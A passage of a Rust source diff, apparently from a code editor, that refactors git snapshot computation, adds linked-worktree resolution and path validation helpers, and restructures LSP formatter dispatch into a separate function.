@@ -6175,22 +6345,9 @@ impl Repository {
let RepositoryState::Local(LocalRepositoryState { backend, .. }) = state else {
bail!("not a local repository")
};
- let compute_snapshot = this.update(&mut cx, |this, _| {
- this.paths_needing_status_update.clear();
- compute_snapshot(
- this.id,
- this.work_directory_abs_path.clone(),
- this.snapshot.clone(),
- backend.clone(),
- )
- });
- let (snapshot, events) = cx.background_spawn(compute_snapshot).await?;
+ let snapshot = compute_snapshot(this.clone(), backend.clone(), &mut cx).await?;
this.update(&mut cx, |this, cx| {
- this.snapshot = snapshot.clone();
this.clear_pending_ops(cx);
- for event in events {
- cx.emit(event);
- }
});
if let Some(updates_tx) = updates_tx {
updates_tx
@@ -6571,6 +6728,120 @@ impl Repository {
}
}
+/// If `path` is a git linked worktree checkout, resolves it to the main
+/// repository's working directory path. Returns `None` if `path` is a normal
+/// repository, not a git repo, or if resolution fails.
+///
+/// Resolution works by:
+/// 1. Reading the `.git` file to get the `gitdir:` pointer
+/// 2. Following that to the worktree-specific git directory
+/// 3. Reading the `commondir` file to find the shared `.git` directory
+/// 4. Deriving the main repo's working directory from the common dir
+pub async fn resolve_git_worktree_to_main_repo(fs: &dyn Fs, path: &Path) -> Option<PathBuf> {
+ let dot_git = path.join(".git");
+ let metadata = fs.metadata(&dot_git).await.ok()??;
+ if metadata.is_dir {
+ return None; // Normal repo, not a linked worktree
+ }
+ // It's a .git file — parse the gitdir: pointer
+ let content = fs.load(&dot_git).await.ok()?;
+ let gitdir_rel = content.strip_prefix("gitdir:")?.trim();
+ let gitdir_abs = fs.canonicalize(&path.join(gitdir_rel)).await.ok()?;
+ // Read commondir to find the main .git directory
+ let commondir_content = fs.load(&gitdir_abs.join("commondir")).await.ok()?;
+ let common_dir = fs
+ .canonicalize(&gitdir_abs.join(commondir_content.trim()))
+ .await
+ .ok()?;
+ Some(git::repository::original_repo_path_from_common_dir(
+ &common_dir,
+ ))
+}
+
+/// Validates that the resolved worktree directory is acceptable:
+/// - The setting must not be an absolute path.
+/// - The resolved path must be either a subdirectory of the working
+/// directory or a subdirectory of its parent (i.e., a sibling).
+///
+/// Returns `Ok(resolved_path)` or an error with a user-facing message.
+pub fn worktrees_directory_for_repo(
+ original_repo_abs_path: &Path,
+ worktree_directory_setting: &str,
+) -> Result<PathBuf> {
+ // Check the original setting before trimming, since a path like "///"
+ // is absolute but becomes "" after stripping trailing separators.
+ // Also check for leading `/` or `\` explicitly, because on Windows
+ // `Path::is_absolute()` requires a drive letter — so `/tmp/worktrees`
+ // would slip through even though it's clearly not a relative path.
+ if Path::new(worktree_directory_setting).is_absolute()
+ || worktree_directory_setting.starts_with('/')
+ || worktree_directory_setting.starts_with('\\')
+ {
+ anyhow::bail!(
+ "git.worktree_directory must be a relative path, got: {worktree_directory_setting:?}"
+ );
+ }
+
+ if worktree_directory_setting.is_empty() {
+ anyhow::bail!("git.worktree_directory must not be empty");
+ }
+
+ let trimmed = worktree_directory_setting.trim_end_matches(['/', '\\']);
+ if trimmed == ".." {
+ anyhow::bail!("git.worktree_directory must not be \"..\" (use \"../some-name\" instead)");
+ }
+
+ let joined = original_repo_abs_path.join(trimmed);
+ let resolved = util::normalize_path(&joined);
+ let resolved = if resolved.starts_with(original_repo_abs_path) {
+ resolved
+ } else if let Some(repo_dir_name) = original_repo_abs_path.file_name() {
+ resolved.join(repo_dir_name)
+ } else {
+ resolved
+ };
+
+ let parent = original_repo_abs_path
+ .parent()
+ .unwrap_or(original_repo_abs_path);
+
+ if !resolved.starts_with(parent) {
+ anyhow::bail!(
+ "git.worktree_directory resolved to {resolved:?}, which is outside \
+ the project root and its parent directory. It must resolve to a \
+ subdirectory of {original_repo_abs_path:?} or a sibling of it."
+ );
+ }
+
+ Ok(resolved)
+}
+
+/// Returns a short name for a linked worktree suitable for UI display
+///
+/// Uses the main worktree path to come up with a short name that disambiguates
+/// the linked worktree from the main worktree.
+pub fn linked_worktree_short_name(
+ main_worktree_path: &Path,
+ linked_worktree_path: &Path,
+) -> Option<SharedString> {
+ if main_worktree_path == linked_worktree_path {
+ return None;
+ }
+
+ let project_name = main_worktree_path.file_name()?.to_str()?;
+ let directory_name = linked_worktree_path.file_name()?.to_str()?;
+ let name = if directory_name != project_name {
+ directory_name.to_string()
+ } else {
+ linked_worktree_path
+ .parent()?
+ .file_name()?
+ .to_str()?
+ .to_string()
+ };
+ Some(name.into())
+}
+
fn get_permalink_in_rust_registry_src(
provider_registry: Arc<GitHostingProviderRegistry>,
path: PathBuf,
@@ -6734,7 +7005,11 @@ fn branch_to_proto(branch: &git::repository::Branch) -> proto::Branch {
fn worktree_to_proto(worktree: &git::repository::Worktree) -> proto::Worktree {
proto::Worktree {
path: worktree.path.to_string_lossy().to_string(),
- ref_name: worktree.ref_name.to_string(),
+ ref_name: worktree
+ .ref_name
+ .as_ref()
+ .map(|s| s.to_string())
+ .unwrap_or_default(),
sha: worktree.sha.to_string(),
}
}
@@ -6742,7 +7017,7 @@ fn worktree_to_proto(worktree: &git::repository::Worktree) -> proto::Worktree {
fn proto_to_worktree(proto: &proto::Worktree) -> git::repository::Worktree {
git::repository::Worktree {
path: PathBuf::from(proto.path.clone()),
- ref_name: proto.ref_name.clone().into(),
+ ref_name: Some(SharedString::from(&proto.ref_name)),
sha: proto.sha.clone().into(),
}
}
@@ -6799,41 +7074,124 @@ fn proto_to_commit_details(proto: &proto::GitCommitDetails) -> CommitDetails {
}
}
+/// This snapshot computes the repository state on the foreground thread while
+/// running the git commands on the background thread. We update branch, head,
+/// remotes, and worktrees first so the UI can react sooner, then compute file
+/// state and emit those events immediately after.
async fn compute_snapshot(
- id: RepositoryId,
- work_directory_abs_path: Arc<Path>,
- prev_snapshot: RepositorySnapshot,
+ this: Entity<Repository>,
backend: Arc<dyn GitRepository>,
-) -> Result<(RepositorySnapshot, Vec<RepositoryEvent>)> {
- let mut events = Vec::new();
- let branches = backend.branches().await?;
- let branch = branches.into_iter().find(|branch| branch.is_head);
+ cx: &mut AsyncApp,
+) -> Result<RepositorySnapshot> {
+ let (id, work_directory_abs_path, prev_snapshot) = this.update(cx, |this, _| {
+ this.paths_needing_status_update.clear();
+ (
+ this.id,
+ this.work_directory_abs_path.clone(),
+ this.snapshot.clone(),
+ )
+ });
- // Useful when branch is None in detached head state
- let head_commit = match backend.head_sha().await {
- Some(head_sha) => backend.show(head_sha).await.log_err(),
- None => None,
+ let head_commit_future = {
+ let backend = backend.clone();
+ async move {
+ Ok(match backend.head_sha().await {
+ Some(head_sha) => backend.show(head_sha).await.log_err(),
+ None => None,
+ })
+ }
};
+ let (branches, head_commit, all_worktrees) = cx
+ .background_spawn({
+ let backend = backend.clone();
+ async move {
+ futures::future::try_join3(
+ backend.branches(),
+ head_commit_future,
+ backend.worktrees(),
+ )
+ .await
+ }
+ })
+ .await?;
+ let branch = branches.into_iter().find(|branch| branch.is_head);
- let diff_stat_future: BoxFuture<'_, Result<status::GitDiffStat>> = if head_commit.is_some() {
- backend.diff_stat(&[])
- } else {
- future::ready(Ok(status::GitDiffStat {
- entries: Arc::default(),
- }))
- .boxed()
- };
- let (statuses, diff_stats) = futures::future::try_join(
- backend.status(&[RepoPath::from_rel_path(
- &RelPath::new(".".as_ref(), PathStyle::local()).unwrap(),
- )]),
- diff_stat_future,
- )
- .await?;
+ let linked_worktrees: Arc<[GitWorktree]> = all_worktrees
+ .into_iter()
+ .filter(|wt| wt.path != *work_directory_abs_path)
+ .collect();
+
+ let (remote_origin_url, remote_upstream_url) = cx
+ .background_spawn({
+ let backend = backend.clone();
+ async move {
+ Ok::<_, anyhow::Error>(
+ futures::future::join(
+ backend.remote_url("origin"),
+ backend.remote_url("upstream"),
+ )
+ .await,
+ )
+ }
+ })
+ .await?;
+
+ let snapshot = this.update(cx, |this, cx| {
+ let branch_changed =
+ branch != this.snapshot.branch || head_commit != this.snapshot.head_commit;
+ let worktrees_changed = *linked_worktrees != *this.snapshot.linked_worktrees;
+
+ this.snapshot = RepositorySnapshot {
+ id,
+ work_directory_abs_path,
+ branch,
+ head_commit,
+ remote_origin_url,
+ remote_upstream_url,
+ linked_worktrees,
+ scan_id: prev_snapshot.scan_id + 1,
+ ..prev_snapshot
+ };
+
+ if branch_changed {
+ cx.emit(RepositoryEvent::BranchChanged);
+ }
+
+ if worktrees_changed {
+ cx.emit(RepositoryEvent::GitWorktreeListChanged);
+ }
+
+ this.snapshot.clone()
+ });
+
+ let (statuses, diff_stats, stash_entries) = cx
+ .background_spawn({
+ let backend = backend.clone();
+ let snapshot = snapshot.clone();
+ async move {
+ let diff_stat_future: BoxFuture<'_, Result<status::GitDiffStat>> =
+ if snapshot.head_commit.is_some() {
+ backend.diff_stat(&[])
+ } else {
+ future::ready(Ok(status::GitDiffStat {
+ entries: Arc::default(),
+ }))
+ .boxed()
+ };
+ futures::future::try_join3(
+ backend.status(&[RepoPath::from_rel_path(
+ &RelPath::new(".".as_ref(), PathStyle::local()).unwrap(),
+ )]),
+ diff_stat_future,
+ backend.stash_entries(),
+ )
+ .await
+ }
+ })
+ .await?;
let diff_stat_map: HashMap<&RepoPath, DiffStat> =
diff_stats.entries.iter().map(|(p, s)| (p, *s)).collect();
- let stash_entries = backend.stash_entries().await?;
let mut conflicted_paths = Vec::new();
let statuses_by_path = SumTree::from_iter(
statuses.entries.iter().map(|(repo_path, status)| {
@@ -6848,37 +7206,35 @@ async fn compute_snapshot(
}),
(),
);
- let mut merge_details = prev_snapshot.merge;
- let conflicts_changed = merge_details.update(&backend, conflicted_paths).await?;
- log::debug!("new merge details: {merge_details:?}");
-
- if conflicts_changed || statuses_by_path != prev_snapshot.statuses_by_path {
- events.push(RepositoryEvent::StatusesChanged)
- }
- if branch != prev_snapshot.branch || head_commit != prev_snapshot.head_commit {
- events.push(RepositoryEvent::BranchChanged);
- }
+ let merge_details = cx
+ .background_spawn({
+ let backend = backend.clone();
+ let mut merge_details = snapshot.merge.clone();
+ async move {
+ let conflicts_changed = merge_details.update(&backend, conflicted_paths).await?;
+ Ok::<_, anyhow::Error>((merge_details, conflicts_changed))
+ }
+ })
+ .await?;
+ let (merge_details, conflicts_changed) = merge_details;
+ log::debug!("new merge details: {merge_details:?}");
- let remote_origin_url = backend.remote_url("origin").await;
- let remote_upstream_url = backend.remote_url("upstream").await;
+ Ok(this.update(cx, |this, cx| {
+ if conflicts_changed || statuses_by_path != this.snapshot.statuses_by_path {
+ cx.emit(RepositoryEvent::StatusesChanged);
+ }
+ if stash_entries != this.snapshot.stash_entries {
+ cx.emit(RepositoryEvent::StashEntriesChanged);
+ }
- let snapshot = RepositorySnapshot {
- id,
- statuses_by_path,
- work_directory_abs_path,
- original_repo_abs_path: prev_snapshot.original_repo_abs_path,
- path_style: prev_snapshot.path_style,
- scan_id: prev_snapshot.scan_id + 1,
- branch,
- head_commit,
- merge: merge_details,
- remote_origin_url,
- remote_upstream_url,
- stash_entries,
- };
+ this.snapshot.scan_id += 1;
+ this.snapshot.merge = merge_details;
+ this.snapshot.statuses_by_path = statuses_by_path;
+ this.snapshot.stash_entries = stash_entries;
- Ok((snapshot, events))
+ this.snapshot.clone()
+ }))
}
fn status_from_proto(
@@ -808,7 +808,10 @@ impl LocalImageStore {
let new_file = if let Some(entry) = snapshot_entry {
worktree::File {
disk_state: match entry.mtime {
- Some(mtime) => DiskState::Present { mtime },
+ Some(mtime) => DiskState::Present {
+ mtime,
+ size: entry.size,
+ },
None => old_file.disk_state,
},
is_local: true,
@@ -2636,11 +2636,10 @@ impl LspCommand for GetCodeActions {
relevant_diagnostics.push(entry.to_lsp_diagnostic_stub()?);
}
- let supported =
- Self::supported_code_action_kinds(language_server.adapter_server_capabilities());
-
let only = if let Some(requested) = &self.kinds {
- if let Some(supported_kinds) = supported {
+ if let Some(supported_kinds) =
+ Self::supported_code_action_kinds(language_server.adapter_server_capabilities())
+ {
let filtered = requested
.iter()
.filter(|requested_kind| {
@@ -2655,7 +2654,7 @@ impl LspCommand for GetCodeActions {
Some(requested.clone())
}
} else {
- supported
+ None
};
Ok(lsp::CodeActionParams {
@@ -4857,9 +4856,14 @@ impl LspCommand for GetFoldingRanges {
self,
message: proto::GetFoldingRangesResponse,
_: Entity<LspStore>,
- _: Entity<Buffer>,
- _: AsyncApp,
+ buffer: Entity<Buffer>,
+ mut cx: AsyncApp,
) -> Result<Self::Response> {
+ buffer
+ .update(&mut cx, |buffer, _| {
+ buffer.wait_for_version(deserialize_version(&message.version))
+ })
+ .await?;
message
.ranges
.into_iter()
@@ -1611,28 +1611,6 @@ impl LocalLspStore {
})
})?;
- /// Apply edits to the buffer that will become part of the formatting transaction.
- /// Fails if the buffer has been edited since the start of that transaction.
- fn extend_formatting_transaction(
- buffer: &FormattableBuffer,
- formatting_transaction_id: text::TransactionId,
- cx: &mut AsyncApp,
- operation: impl FnOnce(&mut Buffer, &mut Context<Buffer>),
- ) -> anyhow::Result<()> {
- buffer.handle.update(cx, |buffer, cx| {
- let last_transaction_id = buffer.peek_undo_stack().map(|t| t.transaction_id());
- if last_transaction_id != Some(formatting_transaction_id) {
- anyhow::bail!("Buffer edited while formatting. Aborting")
- }
- buffer.start_transaction();
- operation(buffer, cx);
- if let Some(transaction_id) = buffer.end_transaction(cx) {
- buffer.merge_transactions(transaction_id, formatting_transaction_id);
- }
- Ok(())
- })
- }
-
// handle whitespace formatting
if settings.remove_trailing_whitespace_on_save {
zlog::trace!(logger => "removing trailing whitespace");
@@ -1702,504 +1680,532 @@ impl LocalLspStore {
} else {
formatter
};
- match formatter {
- Formatter::Auto => unreachable!("Auto resolved above"),
- Formatter::Prettier => {
- let logger = zlog::scoped!(logger => "prettier");
- zlog::trace!(logger => "formatting");
- let _timer = zlog::time!(logger => "Formatting buffer via prettier");
-
- let prettier = lsp_store.read_with(cx, |lsp_store, _cx| {
- lsp_store.prettier_store().unwrap().downgrade()
- })?;
- let diff = prettier_store::format_with_prettier(&prettier, &buffer.handle, cx)
+ if let Err(err) = Self::apply_formatter(
+ formatter,
+ &lsp_store,
+ buffer,
+ formatting_transaction_id,
+ &adapters_and_servers,
+ &settings,
+ request_timeout,
+ logger,
+ cx,
+ )
+ .await
+ {
+ zlog::error!(logger => "Formatter failed, skipping: {err:#}");
+ }
+ }
+
+ Ok(())
+ }
+
+ async fn apply_formatter(
+ formatter: &Formatter,
+ lsp_store: &WeakEntity<LspStore>,
+ buffer: &FormattableBuffer,
+ formatting_transaction_id: clock::Lamport,
+ adapters_and_servers: &[(Arc<CachedLspAdapter>, Arc<LanguageServer>)],
+ settings: &LanguageSettings,
+ request_timeout: Duration,
+ logger: zlog::Logger,
+ cx: &mut AsyncApp,
+ ) -> anyhow::Result<()> {
+ match formatter {
+ Formatter::None => {
+ zlog::trace!(logger => "skipping formatter 'none'");
+ return Ok(());
+ }
+ Formatter::Auto => {
+ debug_panic!("Auto resolved above");
+ return Ok(());
+ }
+ Formatter::Prettier => {
+ let logger = zlog::scoped!(logger => "prettier");
+ zlog::trace!(logger => "formatting");
+ let _timer = zlog::time!(logger => "Formatting buffer via prettier");
+
+ let prettier = lsp_store.read_with(cx, |lsp_store, _cx| {
+ lsp_store.prettier_store().unwrap().downgrade()
+ })?;
+ let diff = prettier_store::format_with_prettier(&prettier, &buffer.handle, cx)
+ .await
+ .transpose()?;
+ let Some(diff) = diff else {
+ zlog::trace!(logger => "No changes");
+ return Ok(());
+ };
+
+ extend_formatting_transaction(
+ buffer,
+ formatting_transaction_id,
+ cx,
+ |buffer, cx| {
+ buffer.apply_diff(diff, cx);
+ },
+ )?;
+ }
+ Formatter::External { command, arguments } => {
+ let logger = zlog::scoped!(logger => "command");
+ zlog::trace!(logger => "formatting");
+ let _timer = zlog::time!(logger => "Formatting buffer via external command");
+
+ let diff =
+ Self::format_via_external_command(buffer, &command, arguments.as_deref(), cx)
.await
- .transpose()?;
- let Some(diff) = diff else {
- zlog::trace!(logger => "No changes");
- continue;
- };
+ .with_context(|| {
+ format!("Failed to format buffer via external command: {}", command)
+ })?;
+ let Some(diff) = diff else {
+ zlog::trace!(logger => "No changes");
+ return Ok(());
+ };
- extend_formatting_transaction(
- buffer,
- formatting_transaction_id,
- cx,
- |buffer, cx| {
- buffer.apply_diff(diff, cx);
- },
- )?;
- }
- Formatter::External { command, arguments } => {
- let logger = zlog::scoped!(logger => "command");
- zlog::trace!(logger => "formatting");
- let _timer = zlog::time!(logger => "Formatting buffer via external command");
+ extend_formatting_transaction(
+ buffer,
+ formatting_transaction_id,
+ cx,
+ |buffer, cx| {
+ buffer.apply_diff(diff, cx);
+ },
+ )?;
+ }
+ Formatter::LanguageServer(specifier) => {
+ let logger = zlog::scoped!(logger => "language-server");
+ zlog::trace!(logger => "formatting");
+ let _timer = zlog::time!(logger => "Formatting buffer using language server");
- let diff = Self::format_via_external_command(
- buffer,
- &command,
- arguments.as_deref(),
+ let Some(buffer_path_abs) = buffer.abs_path.as_ref() else {
+ zlog::warn!(logger => "Cannot format buffer that is not backed by a file on disk using language servers. Skipping");
+ return Ok(());
+ };
+
+ let language_server = match specifier {
+ settings::LanguageServerFormatterSpecifier::Specific { name } => {
+ adapters_and_servers.iter().find_map(|(adapter, server)| {
+ if adapter.name.0.as_ref() == name {
+ Some(server.clone())
+ } else {
+ None
+ }
+ })
+ }
+ settings::LanguageServerFormatterSpecifier::Current => adapters_and_servers
+ .iter()
+ .find(|(_, server)| Self::server_supports_formatting(server))
+ .map(|(_, server)| server.clone()),
+ };
+
+ let Some(language_server) = language_server else {
+ log::debug!(
+ "No language server found to format buffer '{:?}'. Skipping",
+ buffer_path_abs.as_path().to_string_lossy()
+ );
+ return Ok(());
+ };
+
+ zlog::trace!(
+ logger =>
+ "Formatting buffer '{:?}' using language server '{:?}'",
+ buffer_path_abs.as_path().to_string_lossy(),
+ language_server.name()
+ );
+
+ let edits = if let Some(ranges) = buffer.ranges.as_ref() {
+ zlog::trace!(logger => "formatting ranges");
+ Self::format_ranges_via_lsp(
+ &lsp_store,
+ &buffer.handle,
+ ranges,
+ buffer_path_abs,
+ &language_server,
+ &settings,
cx,
)
.await
- .with_context(|| {
- format!("Failed to format buffer via external command: {}", command)
- })?;
- let Some(diff) = diff else {
- zlog::trace!(logger => "No changes");
- continue;
- };
-
- extend_formatting_transaction(
- buffer,
- formatting_transaction_id,
+ .context("Failed to format ranges via language server")?
+ } else {
+ zlog::trace!(logger => "formatting full");
+ Self::format_via_lsp(
+ &lsp_store,
+ &buffer.handle,
+ buffer_path_abs,
+ &language_server,
+ &settings,
cx,
- |buffer, cx| {
- buffer.apply_diff(diff, cx);
- },
- )?;
+ )
+ .await
+ .context("failed to format via language server")?
+ };
+
+ if edits.is_empty() {
+ zlog::trace!(logger => "No changes");
+ return Ok(());
}
- Formatter::LanguageServer(specifier) => {
- let logger = zlog::scoped!(logger => "language-server");
- zlog::trace!(logger => "formatting");
- let _timer = zlog::time!(logger => "Formatting buffer using language server");
+ extend_formatting_transaction(
+ buffer,
+ formatting_transaction_id,
+ cx,
+ |buffer, cx| {
+ buffer.edit(edits, None, cx);
+ },
+ )?;
+ }
+ Formatter::CodeAction(code_action_name) => {
+ let logger = zlog::scoped!(logger => "code-actions");
+ zlog::trace!(logger => "formatting");
+ let _timer = zlog::time!(logger => "Formatting buffer using code actions");
- let Some(buffer_path_abs) = buffer.abs_path.as_ref() else {
- zlog::warn!(logger => "Cannot format buffer that is not backed by a file on disk using language servers. Skipping");
- continue;
- };
+ let Some(buffer_path_abs) = buffer.abs_path.as_ref() else {
+ zlog::warn!(logger => "Cannot format buffer that is not backed by a file on disk using code actions. Skipping");
+ return Ok(());
+ };
- let language_server = match specifier {
- settings::LanguageServerFormatterSpecifier::Specific { name } => {
- adapters_and_servers.iter().find_map(|(adapter, server)| {
- if adapter.name.0.as_ref() == name {
- Some(server.clone())
- } else {
- None
- }
- })
- }
- settings::LanguageServerFormatterSpecifier::Current => adapters_and_servers
- .iter()
- .find(|(_, server)| Self::server_supports_formatting(server))
- .map(|(_, server)| server.clone()),
- };
+ let code_action_kind: CodeActionKind = code_action_name.clone().into();
+ zlog::trace!(logger => "Attempting to resolve code actions {:?}", &code_action_kind);
- let Some(language_server) = language_server else {
- log::debug!(
- "No language server found to format buffer '{:?}'. Skipping",
- buffer_path_abs.as_path().to_string_lossy()
+ let mut actions_and_servers = Vec::new();
+
+ for (index, (_, language_server)) in adapters_and_servers.iter().enumerate() {
+ let actions_result = Self::get_server_code_actions_from_action_kinds(
+ &lsp_store,
+ language_server.server_id(),
+ vec![code_action_kind.clone()],
+ &buffer.handle,
+ cx,
+ )
+ .await
+ .with_context(|| {
+ format!(
+ "Failed to resolve code action {:?} with language server {}",
+ code_action_kind,
+ language_server.name()
+ )
+ });
+ let Ok(actions) = actions_result else {
+ // note: it may be better to set result to the error and break formatters here
+ // but for now we try to execute the actions that we can resolve and skip the rest
+ zlog::error!(
+ logger =>
+ "Failed to resolve code action {:?} with language server {}",
+ code_action_kind,
+ language_server.name()
);
continue;
};
+ for action in actions {
+ actions_and_servers.push((action, index));
+ }
+ }
- zlog::trace!(
- logger =>
- "Formatting buffer '{:?}' using language server '{:?}'",
- buffer_path_abs.as_path().to_string_lossy(),
- language_server.name()
- );
+ if actions_and_servers.is_empty() {
+ zlog::warn!(logger => "No code actions were resolved, continuing");
+ return Ok(());
+ }
- let edits = if let Some(ranges) = buffer.ranges.as_ref() {
- zlog::trace!(logger => "formatting ranges");
- Self::format_ranges_via_lsp(
- &lsp_store,
- &buffer.handle,
- ranges,
- buffer_path_abs,
- &language_server,
- &settings,
- cx,
- )
- .await
- .context("Failed to format ranges via language server")?
- } else {
- zlog::trace!(logger => "formatting full");
- Self::format_via_lsp(
- &lsp_store,
- &buffer.handle,
- buffer_path_abs,
- &language_server,
- &settings,
- cx,
+ 'actions: for (mut action, server_index) in actions_and_servers {
+ let server = &adapters_and_servers[server_index].1;
+
+ let describe_code_action = |action: &CodeAction| {
+ format!(
+ "code action '{}' with title \"{}\" on server {}",
+ action
+ .lsp_action
+ .action_kind()
+ .unwrap_or("unknown".into())
+ .as_str(),
+ action.lsp_action.title(),
+ server.name(),
)
- .await
- .context("failed to format via language server")?
};
- if edits.is_empty() {
- zlog::trace!(logger => "No changes");
- continue;
- }
- extend_formatting_transaction(
- buffer,
- formatting_transaction_id,
- cx,
- |buffer, cx| {
- buffer.edit(edits, None, cx);
- },
- )?;
- }
- Formatter::CodeAction(code_action_name) => {
- let logger = zlog::scoped!(logger => "code-actions");
- zlog::trace!(logger => "formatting");
- let _timer = zlog::time!(logger => "Formatting buffer using code actions");
+ zlog::trace!(logger => "Executing {}", describe_code_action(&action));
- let Some(buffer_path_abs) = buffer.abs_path.as_ref() else {
- zlog::warn!(logger => "Cannot format buffer that is not backed by a file on disk using code actions. Skipping");
+ if let Err(err) =
+ Self::try_resolve_code_action(server, &mut action, request_timeout).await
+ {
+ zlog::error!(
+ logger =>
+ "Failed to resolve {}. Error: {}",
+ describe_code_action(&action),
+ err
+ );
continue;
- };
-
- let code_action_kind: CodeActionKind = code_action_name.clone().into();
- zlog::trace!(logger => "Attempting to resolve code actions {:?}", &code_action_kind);
-
- let mut actions_and_servers = Vec::new();
+ }
- for (index, (_, language_server)) in adapters_and_servers.iter().enumerate() {
- let actions_result = Self::get_server_code_actions_from_action_kinds(
- &lsp_store,
- language_server.server_id(),
- vec![code_action_kind.clone()],
- &buffer.handle,
- cx,
- )
- .await
- .with_context(|| {
- format!(
- "Failed to resolve code action {:?} with language server {}",
- code_action_kind,
- language_server.name()
- )
- });
- let Ok(actions) = actions_result else {
- // note: it may be better to set result to the error and break formatters here
- // but for now we try to execute the actions that we can resolve and skip the rest
- zlog::error!(
+ if let Some(edit) = action.lsp_action.edit().cloned() {
+ // NOTE: code below duplicated from `Self::deserialize_workspace_edit`
+ // but filters out and logs warnings for code actions that require unreasonably
+ // difficult handling on our part, such as:
+ // - applying edits that call commands
+ // which can result in arbitrary workspace edits being sent from the server that
+ // have no way of being tied back to the command that initiated them (i.e. we
+ // can't know which edits are part of the format request, or if the server is done sending
+ // actions in response to the command)
+ // - actions that create/delete/modify/rename files other than the one we are formatting
+ // as we then would need to handle such changes correctly in the local history as well
+ // as the remote history through the ProjectTransaction
+ // - actions with snippet edits, as these simply don't make sense in the context of a format request
+ // Supporting these actions is not impossible, but not supported as of yet.
+ if edit.changes.is_none() && edit.document_changes.is_none() {
+ zlog::trace!(
logger =>
- "Failed to resolve code action {:?} with language server {}",
- code_action_kind,
- language_server.name()
+ "No changes for code action. Skipping {}",
+ describe_code_action(&action),
);
continue;
- };
- for action in actions {
- actions_and_servers.push((action, index));
}
- }
-
- if actions_and_servers.is_empty() {
- zlog::warn!(logger => "No code actions were resolved, continuing");
- continue;
- }
- 'actions: for (mut action, server_index) in actions_and_servers {
- let server = &adapters_and_servers[server_index].1;
-
- let describe_code_action = |action: &CodeAction| {
- format!(
- "code action '{}' with title \"{}\" on server {}",
- action
- .lsp_action
- .action_kind()
- .unwrap_or("unknown".into())
- .as_str(),
- action.lsp_action.title(),
- server.name(),
- )
- };
+ let mut operations = Vec::new();
+ if let Some(document_changes) = edit.document_changes {
+ match document_changes {
+ lsp::DocumentChanges::Edits(edits) => operations.extend(
+ edits.into_iter().map(lsp::DocumentChangeOperation::Edit),
+ ),
+ lsp::DocumentChanges::Operations(ops) => operations = ops,
+ }
+ } else if let Some(changes) = edit.changes {
+ operations.extend(changes.into_iter().map(|(uri, edits)| {
+ lsp::DocumentChangeOperation::Edit(lsp::TextDocumentEdit {
+ text_document: lsp::OptionalVersionedTextDocumentIdentifier {
+ uri,
+ version: None,
+ },
+ edits: edits.into_iter().map(Edit::Plain).collect(),
+ })
+ }));
+ }
- zlog::trace!(logger => "Executing {}", describe_code_action(&action));
+ let mut edits = Vec::with_capacity(operations.len());
- if let Err(err) =
- Self::try_resolve_code_action(server, &mut action, request_timeout)
- .await
- {
- zlog::error!(
+ if operations.is_empty() {
+ zlog::trace!(
logger =>
- "Failed to resolve {}. Error: {}",
+ "No changes for code action. Skipping {}",
describe_code_action(&action),
- err
);
continue;
}
-
- if let Some(edit) = action.lsp_action.edit().cloned() {
- // NOTE: code below duplicated from `Self::deserialize_workspace_edit`
- // but filters out and logs warnings for code actions that require unreasonably
- // difficult handling on our part, such as:
- // - applying edits that call commands
- // which can result in arbitrary workspace edits being sent from the server that
- // have no way of being tied back to the command that initiated them (i.e. we
- // can't know which edits are part of the format request, or if the server is done sending
- // actions in response to the command)
- // - actions that create/delete/modify/rename files other than the one we are formatting
- // as we then would need to handle such changes correctly in the local history as well
- // as the remote history through the ProjectTransaction
- // - actions with snippet edits, as these simply don't make sense in the context of a format request
- // Supporting these actions is not impossible, but not supported as of yet.
- if edit.changes.is_none() && edit.document_changes.is_none() {
- zlog::trace!(
+ for operation in operations {
+ let op = match operation {
+ lsp::DocumentChangeOperation::Edit(op) => op,
+ lsp::DocumentChangeOperation::Op(_) => {
+ zlog::warn!(
+ logger =>
+ "Code actions which create, delete, or rename files are not supported on format. Skipping {}",
+ describe_code_action(&action),
+ );
+ continue 'actions;
+ }
+ };
+ let Ok(file_path) = op.text_document.uri.to_file_path() else {
+ zlog::warn!(
logger =>
- "No changes for code action. Skipping {}",
+ "Failed to convert URI '{:?}' to file path. Skipping {}",
+ &op.text_document.uri,
describe_code_action(&action),
);
- continue;
- }
-
- let mut operations = Vec::new();
- if let Some(document_changes) = edit.document_changes {
- match document_changes {
- lsp::DocumentChanges::Edits(edits) => operations.extend(
- edits.into_iter().map(lsp::DocumentChangeOperation::Edit),
- ),
- lsp::DocumentChanges::Operations(ops) => operations = ops,
- }
- } else if let Some(changes) = edit.changes {
- operations.extend(changes.into_iter().map(|(uri, edits)| {
- lsp::DocumentChangeOperation::Edit(lsp::TextDocumentEdit {
- text_document:
- lsp::OptionalVersionedTextDocumentIdentifier {
- uri,
- version: None,
- },
- edits: edits.into_iter().map(Edit::Plain).collect(),
- })
- }));
- }
-
- let mut edits = Vec::with_capacity(operations.len());
-
- if operations.is_empty() {
- zlog::trace!(
+ continue 'actions;
+ };
+ if &file_path != buffer_path_abs {
+ zlog::warn!(
logger =>
- "No changes for code action. Skipping {}",
+ "File path '{:?}' does not match buffer path '{:?}'. Skipping {}",
+ file_path,
+ buffer_path_abs,
describe_code_action(&action),
);
- continue;
+ continue 'actions;
}
- for operation in operations {
- let op = match operation {
- lsp::DocumentChangeOperation::Edit(op) => op,
- lsp::DocumentChangeOperation::Op(_) => {
+
+ let mut lsp_edits = Vec::new();
+ for edit in op.edits {
+ match edit {
+ Edit::Plain(edit) => {
+ if !lsp_edits.contains(&edit) {
+ lsp_edits.push(edit);
+ }
+ }
+ Edit::Annotated(edit) => {
+ if !lsp_edits.contains(&edit.text_edit) {
+ lsp_edits.push(edit.text_edit);
+ }
+ }
+ Edit::Snippet(_) => {
zlog::warn!(
logger =>
- "Code actions which create, delete, or rename files are not supported on format. Skipping {}",
+ "Code actions which produce snippet edits are not supported during formatting. Skipping {}",
describe_code_action(&action),
);
continue 'actions;
}
- };
- let Ok(file_path) = op.text_document.uri.to_file_path() else {
- zlog::warn!(
- logger =>
- "Failed to convert URI '{:?}' to file path. Skipping {}",
- &op.text_document.uri,
- describe_code_action(&action),
- );
- continue 'actions;
- };
- if &file_path != buffer_path_abs {
- zlog::warn!(
- logger =>
- "File path '{:?}' does not match buffer path '{:?}'. Skipping {}",
- file_path,
- buffer_path_abs,
- describe_code_action(&action),
- );
- continue 'actions;
- }
-
- let mut lsp_edits = Vec::new();
- for edit in op.edits {
- match edit {
- Edit::Plain(edit) => {
- if !lsp_edits.contains(&edit) {
- lsp_edits.push(edit);
- }
- }
- Edit::Annotated(edit) => {
